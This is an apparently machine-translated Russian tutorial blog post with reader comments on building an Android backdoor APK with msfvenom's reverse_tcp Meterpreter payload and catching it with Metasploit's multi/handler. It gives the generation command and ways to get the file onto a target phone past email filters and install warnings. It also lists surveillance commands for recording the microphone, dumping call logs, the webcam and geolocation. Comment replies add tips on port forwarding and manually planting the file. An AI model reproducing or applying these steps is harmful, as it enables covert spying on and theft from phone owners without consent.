Смартфон Android часто является шлюзом к большинству коммерческих гаджетов Интернета вещей. Сигнализация Nest Smoke управляется через соответствующее приложение для Android. Так же как и термостат Nest для контроля температуры. Умные замки, камеры дверного звонка - почти ко всем интеллектуальным устройствам можно получить доступ из Alexa или других основных приложений. Что, если кто-то получит удаленный доступ к такому телефону Android? Вы думаете, что это невозможно? Для этого мы дадим базовую демонстрацию того, как "metasploit" Kali Linux можно использовать для создания бэкдора на вашем телефоне Android.
Примечание: это руководство предназначено для исследователей в области безопасности и любителей. Мы не рекомендуем взламывать чьи-либо телефоны без их разрешения.
Задний план
Прежде чем вы начнете работать с Kali Linux, вам сначала необходимо ознакомиться с его консольным терминалом.
На нем легко найти полный список инструментов, предназначенных для прошивки или операционной системы устройства.
Здесь мы воспользуемся одним из распространенных инструментов под названием "MSFVenom", чтобы вставить вирус в телефон Android. Он генерирует несколько видов полезной нагрузки на основе выбранных пользователем параметров. Эксплойт работает на многих платформах, включая Windows, Android, OpenBSD, Solaris, JAVA, PHP и игровое оборудование.
Запуск Android Metasploit
Следующие шаги продемонстрируют, как загрузить MSFVenom в системе Kali Linux.
Запустите терминал и введите следующую команду.
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R >/root/LOCATION/hackand.apk
Здесь полезная нагрузка запускается с помощью расширения для эксплойтов под названием "Meterpreter".
Чтобы определить IP-адрес хоста прослушивателя, откройте новый консольный терминал и введите ifconfig
. Обычно порт 4444 предназначен для троянов, эксплойтов и вирусов.
После определения IP-адреса вернитесь к предыдущему экрану и введите данные.
Файл "hackand.apk" будет сохранен на рабочем столе и является основным бэкдором, который будет использоваться на телефоне Android.
На следующем этапе запустите "msfconsole", который является распространенным инструментом тестирования на проникновение, используемым с Kali Linux. Для этого введите service postgresql start
, а затем msfconsole
. PostgreSQL относится к базе данных, в которой хранилась консоль.
Как только инструмент проникновения будет готов, вы можете запустить оставшийся эксплойт.
Затем будет использоваться исполняемый файл с именем "multi-handler".
использовать multi / обработчик
На изображении ниже показано, как подключить эксплойт к консоли. Будут использоваться те же IP-адрес и номера портов.
На следующем этапе будет запущен и инициализирован эксплойт msfvenom с помощью простой команды exploit
. Теперь нам нужно найти цель, которой будет телефон Android.
Подключение терминала Kali Linux к телефону Android
Файл hackand.apk, который мы скачали ранее, имеет размер всего 10 КБ. Вам нужно будет найти способ вставить файл в телефон целевого объекта. Вы можете передать вирус через USB или временную почтовую службу.
Как правило, провайдеры веб-почты, такие как Gmail или Yahoo, отказываются передавать этот зараженный вирусом файл.
Android предупредит вас перед установкой программного обеспечения. Но для завершения установки требуется менее 20 секунд, так как вам нужно только "проигнорировать риск и установить". Это делает угрозу несколько серьезной, если ваш телефон находится в режиме разблокировки.
Как показано здесь, телефону может быть нанесен большой ущерб, включая изменение содержимого хранилища, предотвращение перехода телефона в спящий режим, подключение и отключение от Wi-Fi, установку обоев и многое другое.
После установки APK-файл его можно хитро замаскировать в телефоне.
Теперь вы можете использовать множество команд, подобных приведенным ниже, в терминале Kali Linux для управления телефоном. На самом деле вам не нужно их запоминать, поскольку список доступен из простой опции help
в meterpreter
.
record_mic
: запись микрофонадамп журнала вызовов
: получить журнал вызововwebcam_chat
: начать видеочат.geolocate
: узнать текущее местоположение телефона.
Большинство современных телефонов Android не позволяют установить это вредоносное приложение. Таким образом, этот эксплойт обычно работает со старыми моделями Android.
Мысли
В этом руководстве мы рассмотрели базовую стратегию использования Kali Linux для получения доступа к смартфону Android. Несмотря на то, что это очень простой эксплойт, он имеет большое значение с точки зрения безопасности Интернета вещей.
Что вы думаете об эксплойтах Kali Linux? Будете ли вы осторожнее относиться к безопасности своего телефона? Дайте нам знать в комментариях.
8 комментариев
Комментарии закрыты.
Зависание на [*] запущенном обратном обработчике TCP
Терминал KL ожидает обнаружения любого целевого устройства, которое откроет полезную нагрузку. Помните, что это тест на проникновение, поэтому, если эксплойт не может проникнуть в телефон, это означает, что ваш телефон Android был пропатчен, поэтому этот конкретный эксплойт может не работать, потому что ваш телефон не позволяет прослушивать подозрительную сеть. Только если проникновение было успешным, запускается сеанс Meterpreter. Ваш телефон должен быть подключен к той же сети Wi-Fi, что и компьютер с терминалом KL. Попытка проникновения по определению не всегда бывает успешной, поэтому вы должны продолжать пробовать ее с помощью других эксплойтов и инструментов, которые вы можете найти на https://tools.kali.org/. Один из способов (метод, не описанный в этой статье) - использовать службу переадресации портов на вашем терминале KL, например Ngrok. Но мы обратили внимание на эту проблему, и мы постараемся представить новую статью, в которой рассматриваются решения для часто останавливающихся попыток проникновения.
отлично ... но мне непонятно, как вставить этот файл в целевой телефон. Их чистый путь…
См. Последний раздел. Это тест на проникновение, поэтому его цель - выявить потенциальную уязвимость телефона. Единственный способ, которым этот тест будет работать, - это найти разблокированный телефон, в который файл полезной нагрузки (hackand.apk) вставлен вручную или с помощью временной службы электронной почты. Вставка файла займет около 3-5 минут.
как мы можем отправить файл через временную почтовую службу
у меня не работает, когда троян вставляется, он автоматически закрывается через 30 секунд (сеанс завершился) у вас есть решение для этого? и спасибо всем ...
такая же проблема для меня
Это показывает, что в разрешении отказано